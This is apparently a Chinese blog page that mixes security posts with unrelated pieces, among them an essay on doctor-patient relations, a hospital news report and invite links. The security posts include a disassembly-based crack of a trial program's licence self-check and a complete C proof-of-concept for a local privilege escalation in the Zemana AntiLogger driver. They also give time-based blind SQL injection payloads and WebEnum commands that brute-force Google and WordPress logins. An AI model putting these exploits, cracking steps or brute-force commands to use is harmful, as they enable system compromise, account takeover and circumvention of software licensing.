试用版有时间,用户,流量限制。
附suddy分析的自校验,这里改好后其余就好办了。
406b5a
00406B5F 8BC4 MOV EAX,ESP
00406B61 B2 01 MOV DL,1
00406B63 E8 10020000 CALL SuperSoc.00406D78
00406B68 |. 8BF0 MOV ESI,EAX
00406B6A |. 8973 10 MOV DWORD PTR DS:[EBX+10],ESI ; SuperSoc.005A0778
00406B6D |. 85F6 TEST ESI,ESI ; SuperSoc.005A0778
005C2AA3 0000 ADD BYTE PTR DS:[EAX],AL
------------------------------------------
402ec0
00402EC0 |. E8 BFE4FFFF CALL <JMP.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA
00402EC5 |. 8BC8 MOV ECX,EAX
00402EC7 |. 8BD4 MOV EDX,ESP
00402EC9 |. 8BC3 MOV EAX,EBX
00402ECB |. E8 A0210000 CALL SuperSoc.00405070
00402ED0 |. EB 1E JMP SHORT SuperSoc.00402EF0
005C2AC1 0000 ADD BYTE PTR DS:[EAX],AL
--------------------------------------
40f3fd
0040F3FD |. E8 A689FFFF CALL <JMP.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA
0040F402 |. 85C0 TEST EAX,EAX
0040F404 |. 75 23 JNZ SHORT SuperSoc.0040F429
0040F406 |> 68 05010000 PUSH 105 ; /BufSize = 105 (261.)
0040F40B |. 8D85 EEFDFFFF LEA EAX,DWORD PTR SS:[EBP-212] ; |
0040F411 |. 50 PUSH EAX ; |PathBuffer = NULL
005C2ADC 00 DB 00
---------------
408df0
00408DEE |. 50 PUSH EAX ; |PathBuffer = NULL
00408DEF |. 52 PUSH EDX ; |hModule = 7C92E514
00408DF0 |. E8 B3EFFFFF CALL 00407DA8 ; \GetModuleFileNameA
00408DF5 \. C3 RETN
00408DF6 8BC0 MOV EAX,EAX
005C2B1A 00 DB 00
类别:木瓜 查看评论
编者按:
因 《蜗居》当红的作家六六,分别以患者和医生的身份“卧底”上海的大医院半年,试图去揭开中国医患关系恶化的根源。她的结论并不一定正确与深刻,但为观察医 患矛盾提供了另一种视角与体验――理解医生。而有的观点认为,如果不能建立良性的医疗机制和制度,单靠“理解”并不能真正解决医患冲突。
医生的共性是,如果你只与他们见一两次面,你会发现他们大多冷面,难开笑脸。他们说话谨慎,善用模糊词汇。带着探究黑幕的心理进医院,直到后来我才明白,从院长到所有的医生,敢于敞开门让我进去看的原因是,他们觉得能写的黑幕,早就被写完了。
我曾在手术室里看见医生一针一针缝脑膜。这是一门几近失传的手艺,费时又费力,大多数人都用人工脑膜贴上完事。我问他你为什么做这样的活啊!他答我:“我 练手艺,艺不压身。”后来熟了以后,我才知这位患者来自贫困农村,一块脑膜要八百多元,医生用自己的时间和手艺,替他省了。
由于医患冲突激烈,深圳市的山厦医院医生护士,一度戴钢盔上班。 (CFP/图)
作家六六
打破对医生的成见
2007年对我是很糟糕的一年,母亲被检查出乳腺癌。
术后很久,我和母亲都在讨论这个手术的意义。母亲在手术后活动起来,经常胳膊疼。她甚至一度怀疑这个手术是否真的必要。
而我不仅仅跟母亲讨论,也跟不同的医生讨论。我惊奇地发现,不同的医生对这个手术的必要性有完全不同的见解。一部分人认为乳房对于我母亲这个年纪的 人来说,已经失去意义了,而生命高于一切,割除是最安全有效的方法。另一部分医生则认为,这么早期,近乎零的癌细胞,局部清扫一下即可,创伤小,人活着不 仅仅是生命,还要注重生命的质量。
给予我不同信息反馈的两派医生,全部都是我的朋友,忠诚可靠,不涉及利益。
于是我知道,排除在床位、红包、回扣等等之外,医生本身之间在同一病例上都有不同的理解。医生是这样一个行业:它不是ISO9000标准管理系统, 它全凭主观和经验。即使有先进的科技保驾护航,但在治疗上,依旧以个人判断以及对医学的认知水平为基准。不同的人,标准截然不同。
因此我有理由相信,我们对医生的了解,很肤浅,很片面,大多来源于报纸媒体等的宣扬,我们张口提及的都是医疗事故、掩盖、医药代表、过度医疗等。
2008年夏天,我母亲又被查出有脑瘤。这里我要提到一位医生,他姓孔,是在我母亲第一次动乳腺癌手术的时候结交下的医生。母亲对他几近于迷信,无 他,他在母亲这里有权威,且愿意担当起医生的责任,是他替母亲做出决定不要化疗了,因为化疗对极早期癌症来说意义不大,还伤身体。他的一句:“你相信我, 出事我负责!”让我们从此坚定地跟他走。
我母亲一次去见他,跟他说自己三叉神经疼,孔医生对母亲端详半天,建议母亲去做个脑部检测,他说:“我怕里面不好。”事实证明他的判断是正确的,母亲大约是几年前起,脑部生长良性肿瘤,现在长大压迫面部神经了。
母亲在上海华山医院接受了第二次手术。
华山医院神经外科大名鼎鼎,赵本山的脑溢血就是在那里治好的。我又一次与医生打上交道。医生的共性是,如果你只与他们见一两次面,你会发现他们大多 冷面,难开笑脸,“冷漠”是第一印象。他们说话谨慎,善用边缘词汇,诸如大概,可能,也许,百分比。当我开始设计《心术》这本小说的时候,曾经想将这所医 院的院长设计为反面典型。他是我的朋友,只有朋友可以说了不被告。带着探究黑幕的心理进院,直到后来我才明白,从院长到所有的医生,敢于敞开门让我进去看 的原因是,他们觉得能写的黑幕,早就被写完了。最差不也就写那些吗?
你该怎样信医生
最终促使我走进医生的世界,从一个病患家属的眼光转为医生的视角,是缘于我偶然病倒住院。人在虚弱的时候,我发现是最悲观失望对一切产生怀疑的时 候,我把医生当作精神寄托,也不断质疑他们每句话的潜意思,他们是不是暗示我,我已经病入膏肓了?他们是不是故意把我的病说得很严重,以方便榨取钱财?我 在负面情绪中摇摆。
等我转危为安以后,决定走进医生的世界。我被医院同意,以一个医生的身份,走进了医生的世界(注,约半年)。
一天,我和吴教授出台会诊。
我坐在吴教授身后,听某女病人如下对话:“医生啊,我们那边的医生让我过来看看,说我有垂体瘤,麻烦你给看看。”
吴教授:“你没有垂体瘤,CT里没有任何明显指征说明你有垂体瘤。”“可我为啥不怀孕呢?”“这个你要问妇科大夫。”“妇科大夫说了,我不怀孕是因为长了垂体瘤。”
“可我说了,你没有垂体瘤。你相信我还是相信她呢?”“我不是不相信你,可我要是没有垂体瘤,为啥不怀孕呢?”“同志,你到底希望长瘤还是不希望长瘤?”“我不希望。”“那我跟你说了,你没有垂体瘤啊!你去妇科再看看。”
……
那一个下午,吴教授需要这样鸡生蛋蛋生鸡地解释给病人很多遍类似的问题。人对于医生的信任应该怎样才能够建立起来呢?
去年我摔断胳膊,医生告诉我有两种治疗方案,一种是保守治疗,让骨头长在胳膊里,缺点是有可能以后阴天下雨疼痛。另一个是开刀治疗,取出碎片,缺点是有可能损伤运动神经。
正常情况下,医生会说:“我告诉你两种后果,你自己决定治疗方法,我不能替你做决断。”
这个医生我信任他,我让他替我决断,他最终让我不开刀保守治疗。我的信任,为我省了一刀的费用和疼痛,且保护了我的运动神经。目前为止没出现下雨疼痛的症状。他因我的信任而担负了责任。这就回到了一个问题上,你该怎样信任一个医生?
信任一个人,就这么困难吗?
医生的委屈
在医院时亲身经历这样一件事。有个孩子,五岁,病毒反复感染角膜,视力迅速下降,一周前还0.8,到眼科的时候就只剩0.1了。那天接待他的医生是小波。小波和他素昧平生,一听说这状况就急了,带着这个小孩楼上楼下地跑,要最快时间做出各种诊断,尽早手术。
我是跟着后面楼上楼下地跑的。做到一个房角测试检查的时候,小波刚推门,有个七十多的老头就拿拐杖撑住门,说,你们医生就是这样腐败的,利用职权,老是插队!那要我们拿号干吗?他一说,群情激愤。小波只好解释说,这个小孩只有五岁,马上就要失明了,要抢时间。
老头说,我们这里哪个不是要失明的?我们为做这个检查,哪个不是排队好几个礼拜的?谁都不能插队。
小波解释说,你能等,小孩不能等。
老头说,谁都不能等!疾病面前人人都一样。
我当时真想煽他耳光。我一气之下一把拉过老头说:“你都这么大岁数了,看不见有什么关系?他才五岁,你七十多的老头跟个小孩计较?”
老头拿拐杖打我,要不是小波拉着我,我肯定就煽过去了。
你们没见到那个孩子,不知道他多可怜。你不拉他的手,他就会顺楼梯滚下去。后来小波跟老人说,你先看,你看完了我们再看。
老头一本正经地说,我就是维护正义的。我不看,我看在这里,大家都看完了我才看。
我的眼泪当场就下来了,我都不知道为什么对小孩子这样投入情感。也许是自己有儿子,不忍心看小孩受罪。
小波说,以前就出现过这种情况,他为此难受了很久。有个小孩做手术,排队排得一点一点视力弱下去,手术前一天晚上还能数清楚几个灯泡,第二天上了手术台,又撤下来,因为完全没视力了。对小孩而言,时间就是视力。他到现在都在自责,如果当天晚上加班给他做手术……
所以我非常理解他这次为什么如此投入,其实是在弥补过去自己的内疚。
我们总拿放大镜挑剔别人的缺点和过失。
却对善良和恩惠坦然受之。
人和人之间的信任感恩,就是这样毁坏的。
医院的信、望、爱
我在手术室遇到个我以为要死掉的男人,全部的人都觉得他不行了。
但医护人员明知不可为而为之,最后关头奇迹发生。这个人在经过十几个小时的抢救后,救回来了。连医生都擦着汗说:“他命大!”
所以我希望病患家属,对医生要多些感恩,少些责难,要知道,神明再保佑,医生放弃治疗,管子一拔,啥都没了。
在医院呆的这一段,让我非常清楚地认识到,无论你病患家属什么态度,医生护士再委屈,内心里是有杆秤的,不会因为家属的不理解,纠缠,吵闹而放弃一 条生命。《圣经》上说,这世界有三样东西对人类是最重要的,FAITH(信),HOPE(望),LOVE(爱)。我认为,我能看到的对这三个字最好的诠 释,就是医院。
我曾在手术室里看见医生一针一针缝脑膜,这是一门几近失传的手艺,因为费时又费力,大多数人都用人工脑膜贴上当补丁完事。我问他你为什么做这样的活 啊!他答我:“我练手艺,艺不压身。”后来熟了以后,我知这位病患来自福建山区农村,年收入都负担不起这台手术,一块脑膜要八百多元,他用自己的时间和手 艺,替他省了。
他做这样的好事,躺在病床上的病人,永远不会知道,新闻媒体也不会报道他的善心。如果恰巧不是我站边上,又多话好问,这样的事就湮灭了。我知他也拿红包,也拿回扣,也推荐最贵的药给富豪,但同时,他和他的同事们,每个月都在为付不起医药费逃跑的人们垫资。
如果我们有非常完善的健保制度,药品公平竞争进入市场,由病患自己选择,医生只有处方权而没有推销权,国家提高医生问诊的待遇和专业技能的待遇,而 药物因渠道畅通价格低廉,医保局不是只下拨医院固定的数额,余额让医院自己补齐解决;那么,我们或许就能从医生和病患的直接对抗中走出来,就不会再把原本 属于制度的问题,直接推及到人与人之间的诚信上去。
态度决定医患矛盾?
我在医院碰到一个非常有意思的医生,一度颠覆了我对医生的全部判断。
他是医院里处理医患纠纷的院长办公室主任,他本人也是一位医生。他跟我说,你写的小说都是浮在表面的:我告诉你一个事实:60%的医患纠纷,责任都在医院。
这句话对我实在是太震撼了!
他说,病人到医院来是干什么的?看病的。谁吃饱饭没事干,到医院来吵一架弄点钱花花?
病人来闹,就是因为医疗不顺利,就是有问题。什么样的问题?我认为是态度问题。有的时候的确是医生的责任心不够,疏漏;有的时候是态度不好,解释不到位;有的时候是给病人的期望值太高,最终没达到。所有的这一切,都是医生的问题。
他说,你各个医院走一走,大部分医生可能职业生涯里都会有被投诉的经历,但经常被投诉的,就那么少数几个。我一直认为这就是害群之马,就是这几个人 坏了医生队伍的素质。他们没有责任心,没有同情心,没有怜悯心,把病人当机器,把自己当操作员。他们的口头禅就是工厂产品都有2%的次品率,我们医生一天 都看一百个病人,怎么不能错两三次?有这个态度放这里,他就不配当医生,这和你待遇高低、公平不公平没有任何关系。你增加了病患的痛苦,你拉长了治疗的过 程,你多花了病患的钱,你就是坏人。
他说,我工作一生,门诊一天看病八十个以上,每个患者一到两分钟。我的手术也有成功也有失败,但没有一个病人投诉我。因为我以心换心。病人进门,你 冲他笑一下有什么难的?你的说话语气加一个请字,有什么难的?来看病的人,你当他们都是你的父母,你的兄弟姐妹,你的小孩,你会这样呼来唤去居高临下吗?
他说大部分病患都是通情达理的。你工作做到位了,他们大多能够理解。他们要的也就是一个平等对待,争的是一口气。
他的说法,被我在医院里当“卧底医生”的那段经历验证了。对于一个完全没有医学背景的人来说,我起到了甚至连医生都起不到的作用,这是令我极其诧异 的。病患是病急乱投医,他们只要看到一个穿着白大褂的和善的面孔,挂着照片和名牌,就会像抓住救命稻草一样地倾诉。我的医生朋友们在解决完他们的工作以 后,便将这样一部分病人转移给我,我的功用就是出借耳朵和同情心再加上温存软语。
我抽出相当一部分时间听他们说疾病的起源,家庭的纠纷,老板的残酷,未来的担忧,甚至房贷还有多少没还等等,听到动情处,我会提出我的意见甚至给予拥抱。在我离开医院以后的好几个月,还有病人跟人打听那个“张大夫,人特好”。
所以我尽量地告诉医生朋友们,你如果换一种柔和的语气,多说哪怕一句关爱的话,病患和家属,都对你恨不起来。
重新建立起一种良性循环,一定需要有一方,先伸出手来。相对而言,可能医生更简单。
这就是我为什么要写《心术》,我希望它可以为双方打开一扇门,架一座桥,从相互怀疑敌视,到相互换位理解,尽量去信赖这个世界,我们就能增加安全感,幸福感。
类别:默认分类 查看评论
今天才看到了xcon2010的日程,讨论病毒的有点多哈,有点像病毒专场了,:),不过还是报名参加了,已经拿到了参会证,8月3日中午的飞机到北京,订了会议酒店对面的如家酒店,有到的朋友到时候联系哈.
今天才看到了xcon2010的日程,讨论病毒的有点多哈,有点像病毒专场了,:),不过还是报名参加了,已经拿到了参会证,8月3日中午的飞机到北京,订了会议酒店对面的如家酒店,有到的朋友到时候联系哈.
影响产品版本:
Zemana AntiLogger <=1.9.2.2.206
细节:
AntiLog32.sys 创建名为AntiLog32的设备,并处理0x8000201c的控制码,支持将一个PID所在进程的TOKEN修改为另一个的,并没有任何安全性检查,可引发权限提升
在AntiLog32设备打开时,会检查当前进程是否是带数字签名的,但方法仅仅是通过map 进程的section 并检查security节是否存在,可以轻易绕过。
通过提权的方式是ZwSetInformationProcess->ProcessAccessToken,因此需要一个空进程或仅有一个线程的进程,需要先创建暂停的进程,提权后再resume.
利用代码:
#include "stdafx.h"
#include "windows.h"
#include "winioctl.h"
#define IOCTL_IMPERSONATE_PROCESS CTL_CODE(0x8000 , 0x807 , METHOD_BUFFERED , FILE_ANY_ACCESS)
typedef struct _IMPERSONATE_PROCESS{
HANDLE ImpersonateProcess ;
HANDLE SystemProcess ;
}IMPERSONATE_PROCESS , *PIMPERSONATE_PROCESS;
int main(int argc, char* argv[])
{
printf("Zemana AntiLogger <=1.9.2.2.206 AntiLog32.sys <= 1.5.2.755\n"
"Local Privilege Escalation Vulnerability Proof-of-Concept\n"
"2010-7-28\n"
"By MJ0011 th_decoder@126.com\n\nPress Enter\n");
getchar();
//bypass some useless create check
PIMAGE_DOS_HEADER pdoshdr = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
PIMAGE_NT_HEADERS pnthdr = (PIMAGE_NT_HEADERS)((ULONG)pdoshdr + pdoshdr->e_lfanew);
PVOID waddr = &pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress ;
ULONG oldp ;
VirtualProtect(waddr , sizeof(ULONG) , PAGE_READWRITE , &oldp);
pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0x1 ;
VirtualProtect(waddr , sizeof(ULONG) , oldp , &oldp);
HANDLE hdev = CreateFile("\\\\.\\AntiLog32" ,
FILE_READ_ATTRIBUTES ,
FILE_SHARE_READ ,
0,
OPEN_EXISTING ,
0,0);
if (hdev == INVALID_HANDLE_VALUE)
{
printf("cannot open device %u\n" , GetLastError());
getchar();
return 0;
}
STARTUPINFOA sia ;
memset(&sia , 0 , sizeof(sia));
sia.cb = sizeof(sia);
PROCESS_INFORMATION pi ;
memset(&pi , 0 , sizeof(pi));
if (!CreateProcess("c:\\windows\\system32\\cmd.exe" ,
NULL ,
NULL,
NULL,
FALSE ,
CREATE_SUSPENDED,
NULL,
NULL,
&sia ,
&pi))
{
printf("cannot run cmd.exe....%u\n", GetLastError());
getchar();
return 0 ;
}
IMPERSONATE_PROCESS ip ;
ip.ImpersonateProcess = (HANDLE)pi.dwProcessId ;
ip.SystemProcess = (HANDLE)4 ; //// WinXP and later
ULONG btr ;
if (!DeviceIoControl(hdev , IOCTL_IMPERSONATE_PROCESS , &ip , sizeof(ip) , NULL , 0 , &btr, 0))
{
printf("cannot impersonate process %u\n" , GetLastError());
getchar();
return 0 ;
}
ResumeThread(pi.hThread);
printf("OK\n");
return 0;
}
类别:默认分类 查看评论
快下班的时候看了下mod_proxy_http的代码,这种漏洞完全不给力啊,以后不看了……
"哪个让你直播的"
估计这个关键字能火。
http://video.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=%C4%C4%B8%F6%C8%C3%C4%E3%D6%B1%B2%A5%B5%C4围观
类别:默认分类 查看评论
http://www.cnbeta.com/articles/117703.htm
腾讯QQ今天爆出一个0DAY,聊天记录查看未对HTML和脚本标记做过滤的注射漏洞。
这类漏洞不是什么新玩意的漏洞,关注漏洞的人知道,从5,6年前,各种位置脚本注射的安全漏洞,在QQ里都出现过,个人昵称,签名,群说明,QQ MAIL,修补来修补去,虽然腾讯作为国内对安全重视度最高的互联网企业,内部安全团队过百人,也只能是今天补完A漏洞,明天出现B漏洞,后天下个版本又出现A漏洞的的怪圈循环。QQ 2010 SP0 还做了严格限制的检测,QQ 2010 SP1却重现问题,问题何在呢?
我觉得或者是开发团队换班,或者主要程序员换班,新开发者缺乏安全意识,未能理解上个版本的限制代码的安全含义,觉得是无效的代码进行了删除。或者是程序大部分代码重写,以前继承的代码做了重大修改,而老的开发人员以前只是遵循安全人员的指示临时加上的检测代码,在新的改写中,没有新的安全人员跟进,给予了删除。
可见现在阶段,即使腾讯这样规模的开发团队,遵循的开发还是:安全问题暴露-〉安全人员指导开发人员修复,但是开发人员既不理解也缺乏安全能力,新版本中,人员一改组,代码一改变,安全问题又重现,而安全人员又缺乏对历史的安全问题的追踪和安全测试的能力,导致问题重复出现,难以从根本性上去改进安全问题,更别说推进SDL了。而建立安全测试过程,追踪历史漏洞并对新版本进行追踪测试,是提高产品安全质量改进过程的第一步。
腾讯是有名的把软件当服务来做的公司,做技术拼的是硬实力,做服务拼的是软硬综合实力,安全问题既涉及到安全意识,安全过程,安全管理的软实力,也涉及到安全能力的硬实力。作为国内互联网软件的领头羊,希望腾讯能对安全测试有足够的重视。
阅读全文
类别:默认分类 查看评论
本公司专业从事渗透测试、网站检测等工作,因工作需要,现在诚聘网络安全技术人员加盟,学历无任何要求,但在其他公司中从事过这方面工作、具备丰富经验者及在各级杂志发表过自己的原创技术文章者优先
待遇:
试用期原则上3个月,表现突出提前转正。转正后,享受正式员工待遇:签定劳动合同;失业、医疗、养老保险俱全;工资根据技术水平和工作成绩从3K到1W不等,上不封顶,表现突出的可随时调整工资;工作期间及年终根据工作成绩发放奖金。
双休日、法定节假日休息。
招聘人数:3人
具体要求如下(符合其中几条也可以):
(1)熟练掌握各类Web渗透技术的手法和提权方式;
(2)熟悉JSP、ASP、PHP等脚本语言,对脚本和系统都要有一定程度的解读能力;
(3) 熟练掌握内网渗透的相关知识,具备丰富的实战经验
(4) 具有良好的团队合作精神
也欢迎基础扎实、学习能力强、适应新环境快的应届毕业生踊跃报名。
有意向的朋友,请联系我们详谈,联系方式:QQ:5O351O674
产妇因少送红包肛门被缝 医院称免费痔疮手术
深圳一名产妇疑因未给助产士足够的红包遭到报复,肛门竟然被助产士缝上。医院方解释称肛门并未完全被封,是助产士好心帮孕妇做了一个免费的痔疮手术。
产妇:分娩后发现肛门竟被缝针
产妇的爱人陈先生说,7月23日上午,他带老婆刘花(化名)进入深圳凤凰医院待产,下午3时45分顺产生下一个男婴。到了晚上9点多时,刘花开始喊疼,肛门肿成了鸡蛋大小,周边都是线,显然是肛门被线扎上了。
“肛门肯定是被缝针了,院方解释是缝了针之后在肛门周边缠了线圈,就像缝衣服一样缝完针之后沿着周边来回地打结,并没有缝那么多针。”陈先生说。
院方为什么要给刘花的肛门扎上线圈?陈先生称,当时医院工作人员答复是刘花有痔疮,做了痔疮手术之后才成这种现状。陈先生百思不得其解:“老婆没有什么痔疮,就算有痔疮也不应该在生孩子的手术后立即做痔疮手术啊?”
陈先生询问主治医生,医生称不知道怎么回事,医生只做了阴部侧切手术,谁替她做了肛门的手术该医生毫不知情。陈先生找到助产士,答复是,助产士发现孕妇刘花有痔疮,免费给她做了痔疮手术并扎了线圈。
产妇家属:助产士术前频发送礼暗示
陈先生认为这可能是报复。当天他和老婆到达住院部后,选了高级包房。助产士进到病房称:“等会孩子是我来接生,孩子来到世上第一个看到的人是我,你们准备一下。”陈先生说,当时没有听懂,继续吃饭,5分钟后该助产士再次来到病房,称“准备好了没有,你究竟带了多少钱。”陈先生这时才意识到可能是来要红包,只好答称只带了银行卡,现金只有200元。几分钟后,助产士再次来到病房,询问“准备好没有”,直到助产士第四次来询问“准备好没有”时,陈先生说可以先给医生和助产士一人100元,手术完后绝对送上不低于1000元的红包。助产士说“你不要跟我来这一套,我们在医院见的人多了”。最终,助产士收下了100元,但显得非常气愤,而产科医生拒绝了这100元。
医院回应:是好心免费做了痔疮手术
昨日下午,南都记者前往凤凰医院,该院院长赵女士说,刘花身有痔疮,且痔疮痔核在出血,所以助产士在出血处做了“结扎”处理,“完全是助产士的好心”。
她承认助产士收了100元钱而医生拒绝了这100元,但她表示医院对收红包行为是会严厉处理的。
助产士究竟可不可以不经病人同意就做手术?赵女士说,严格按照医疗规程,对于痔疮出血的处理是不应该由助产士负责,但是这是一名经验丰富的助产士,这个处理本身并不复杂,且当时也不能马上联系到外科医生,所以就暂时由她处理了。(南方都市报)
类别:默认分类 查看评论
http://t.qq.com/invite/9bf44db000d6458b2401
http://t.qq.com/invite/be514b5be7c81df0b583
http://t.qq.com/invite/34ecd08f13ec2df7c6b5
http://t.qq.com/invite/b4bac868a159a4ce382f
http://t.qq.com/invite/c58a3763289c90d2f393
http://t.qq.com/invite/127a6fadeeed016c97c7
http://t.qq.com/invite/9c9374bb8e5b3b2bef5d
http://t.qq.com/invite/f868d0fef183b2ec5d8d
http://t.qq.com/invite/110ef7e61754d6dd4233
http://t.qq.com/invite/ca64fbdcadc2a9991bdf
http://t.qq.com/invite/30668b68b6c03671f02d
http://t.qq.com/invite/b9407f100bcf913cc819
http://t.qq.com/invite/faa5bb3df623c4ac0e79
http://t.qq.com/invite/1b42f0d4a7596197b017
http://t.qq.com/invite/be67a6d8fd4ae0861c43
http://t.qq.com/invite/5926f4c89a0b5a2f3d93
http://t.qq.com/invite/73d4ae7c5ffc7fbe51bb
http://t.qq.com/invite/935e68d7f291ee181cb1
http://t.qq.com/invite/aba768a8d035374a9c7b
http://t.qq.com/invite/e60ba99e7d7a44faf1f9
http://t.qq.com/invite/42a120201f56cadf0273
http://lifesinger.org/blog/2010/07/goog-docs-copy-tech/
原理:
"到此真相大白:当用户按下
Ctrl + C 时,js 会注入事件,首先根据坐标从数据里取出对应文本,然后将文本赋值给 textarea, 并将其激活和选中。这样,就和用户选中 textarea 的内容,再按下 Ctrl + C 的效果是一样了"demo:
http://lifesinger.github.com/lab/2010/goog-docs-copy-demo.html
另外的一个利用:http://yiminghe.javaeye.com/blog/722264
从这个例子说明一个问题:“安全其实就是一种意识”
上面的2位前端工程师以及GOOGLE的工程师,只是利用这个东西来实现‘功能’,而没有意识到带来的安全问题。就和类似于猥琐的click hijack、一些跨域的一些问题的发现,其实对于前端工程师可能早就用烂了.....
其实这个完全可以用来达到“Clipboard Hijack Attack”的效果。如在no-copy的demo:http://lite-ext.googlecode.com/svn/trunk/lite-ext/playground/no-copy/no-copy.html 页面内容是一个“0day Exp”的代码,然后攻击者故意禁止鼠标右键,那么你可能会使用 ctrl-c来copy代码,后到本地环境编译调试,攻击者可以偷偷的在代码里插入一些恶意代码来达到攻击目的......
类别:默认分类 查看评论
SELECT BENCHMARK(10000000,ENCODE('abc','123')); [around 5 sec]
SELECT BENCHMARK(1000000,MD5(CHAR(116))) [ around 7 sec]
Example: SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
Time-Based Blind SQL Injection with Heavy Queries
今天看到一篇介绍,居然用Timing Attack 来猜测OpenID的签名!看完之后,我觉得这个作者真的很YY,但是也很敢想啊!
http://www.emerose.com/timing-attacks-explained.html
类似OpenID的实现,签名本身算法没有问题,问题是出在字符串比较上
一般都是这样验证签名:
if (signature(message) == signature_bytes)
return true;for (i = 0; i < a.length; i++) {
if (a[i] != b[i])
return false;
}
return true;所以作者就利用这种微小的时间差,遍历26个字母,找到正确的那个,然后依次推测第二位、第三位。。。。注意到如果一旦发现顺序比较的两个字符不相等,就退出循环了。这和全部跑完再退出循环所花费的时间是不同的。
再精确一点,比较第一个字符就退出,和比较完第二个字符才退出,一直到比较完N个字符才退出,所花费的时间是有细微的差别的!AAAAAAAAAA
BAAAAAAAAA
CAAAAAAAAA
DAAAAAAAAA
...
XAAAAAAAAA
YAAAAAAAAA
ZAAAAAAAAA
作者也回应了比较于网络延时的话可以忽略这种微小的字符比较时间差的问题,他统计了很多次数据,最后得出了一些实验数据,并会在blackhat上公开他的研究成果。
在我看来,有点Mission Impossible的味道,估计实用价值不会太大,不过还是很期待。
阅读全文
类别:象牙塔 查看评论
1.直接SSL 进465
2.587 协商后进TLS
[R] 220 mx.google.com ESMTP v38sm3880434wfh.12
[S] EHLO smtp.gmail.com
[R] 250-mx.google.com at your service, [121.0.29.239]
[S] STARTTLS
[R] 220 2.0.0 Ready to start TLS
从此以后。。。
if (_usessl && SSLversion >= 3)
{
if (sslstream == null || !sslstream.IsAuthenticated)
{
sslstream = new SslStream(socket.GetStream());
sslstream.AuthenticateAsClient("smtp.gmail.com");
reader = new StreamReader(sslstream);
writer = new StreamWriter(sslstream);
}
}
writer.WriteLine(cmd);
writer.Flush();
类别:木瓜 查看评论
WebEnum is a tool to enumerate http responses to dynamically generated queries.
It is a flexible universal tool useful to perform penetration testing to web servers. It is useful to
- Bruteforce web accounts and passwords
- Discovery directories, files and users with ~user Apache method
- Guess table names and columns size in SQL injection
- Fuzz HTTP requests including GET, POST and HTTP Header
- Audit webserver behaviours generating multiple HTTP requests
Is available an italian tutorial in dissecting security blog.
Usage:
./webenum [-w wordlist] [-h header] [-d POST data] [-m match] URL
WebEnum generate URL, POST data or headers using special dynamic string (%%WORD%%, %%WORD[0-9]%%, %%INT%%, %%CHAR%%, %%TABLE%%). Searched pages are distinguished by other with a little python statement specified in -m option. More explanation after examples.
Examples¶
Enumerate files and directories on www.target.com (no wordlist specified, using internal one)
./webenum.py -m "status_code != 404" http://www.target.com/%%WORD%%
Bruteforce Google account user@gmail.com with passwords in passwords.txt
./webenum.py -w passwords.txt \
-d "Email=user@gmail.com" \
-d "Passwd=%%WORD1%%" \
-d "accountType=GOOGLE" \
-d "service=lh2" \
-m "'SID' in response" \
"https://www.google.com/accounts/ClientLogin"
Bruteforce Wordpress account trying users in users.txt with password list in passwords.txt
./webenum.py -w users.txt -w passwords.txt \
-d "log=%%WORD1%%" \
-d "pwd=%%WORD2%%" \
-d "wp-submit=Log%20In" \
-m "'login_error' not in response" \
http://myblog.wordpress.com/wp-login.php
Enumerate emails in emails.txt using google search
./webenum.py -w emails.txt -m "'No results found' not in response" http://www.google.com/search?q=\"%%WORD1%%\"
Find table names in SQL injection, using internal wordlist
./webenum.py -m "'Table not found' not in response" \
http://www.target.com/page.php?id=4 UNION SELECT 1,1,1 from %%WORD%%
Find table column number in SQL injection
./webenum.py -m "'Columns not match' not in response" \
http://www.target.com/page.php?id=4 UNION SELECT %%TABLE%% from tablename
Dynamic strings allowed in URL, headers and POST data¶
- %%WORD%%, generate strings fetched from internal wordlist of ~900 common words.
- %%WORD[0-9]%% generate strings fetched from wordlist files specified in -w options.
- %%INT%%, generate integer ranges. Default: from 0 to 50.
- %%CHAR%%, generate character and string ranges. Default: from 'a' to 'z'.
- %%TABLE%%, generate 1,1,...,1 string, useful in sql injection to enumerate columns. Default: from 0 to 50.
INT, CHAR and TABLE default option can be customized using [end] or [start]:[end], for example as %%INT100:110%%, %%INT1%%, %%CHARaaa:zzz%%, %%TABLE100%%.
Match¶
Correct response are distinguished with a little python statement. The checkable parameters are response and status_code. Match strings can be
"'Logged' in response or status_code == 200" "'Wrong password' in response"
POST datas, headers and wordlists¶
Dynamic strings are allowed in POST data (-d) and headers (-h) as in URL. With %%WORD[0-9]%%, wordlist files paths are needed. Multiple values are supported:
-d "param1=value" -d "param2=value" -d "param3=%%WORD%%" -h "User-Agent:Mozilla Firefox %%INT4:12%%.0" -h "Referer:%%WORD1%%" -w users.txt -w password.txt
more in url: https://code.google.com/p/webenum/ 阅读全文
类别:网络渗透技术 查看评论
一些数学竞赛或者智力游戏中经常见到给一组数列找规律,让给出下面一个数.其实这些纯粹是扯淡.我可以给任何任意n个数据给出一个n为周期的数学表达式出来.什么意思呢?比如你给出a,b我可以给你一个表达式f(n),得到f(1)=a,f(2)=b,然后周期是2,就是f(3)=a,f(4)=b,就是循环得到a,b,a,b,a,b.多个数也同样可以.
其实f(n)的表达式很简单,f(n)=a1*x^1^n+a2*x^2^n+......+an*x^n^n,其中x是x^n=1的一个最小幅角跟.x=e^i2p/n
比如n=1 x=1
那么f(n)=a1*1^n 解得a1=f(1),有f(n)=f(2)=f(1)
n=2 x=-1
那么 f(n)=a1*(-1)^n+a2*(-1)^2^n=a1*(-1)^n+a2*1^n
解得a1=1/2(f(2)-f(1))
a2=1/2(f(2)+f(1))
比如 数列1,7,1,7,1,7..... 可以表示成f(n)=3*(-1)^n+4*1^n
n=4 x=i
f(n)=a1(i)^n+a2(-1)^n+a3(-i)^n+a4(1)^n
阅读全文
类别:默认分类 查看评论
撒这里,有要的自己copy吧:
http://t.qq.com/invite/430756915f2baac554d9
http://t.qq.com/invite/37ddfea7e54cfd3e7f27
http://t.qq.com/invite/9bf44db000d6458b2401
http://t.qq.com/invite/161f9a8afb731e073015
http://t.qq.com/invite/0167a3bfe809dac5e54f
http://t.qq.com/invite/c155a181d9b7c3c721e9
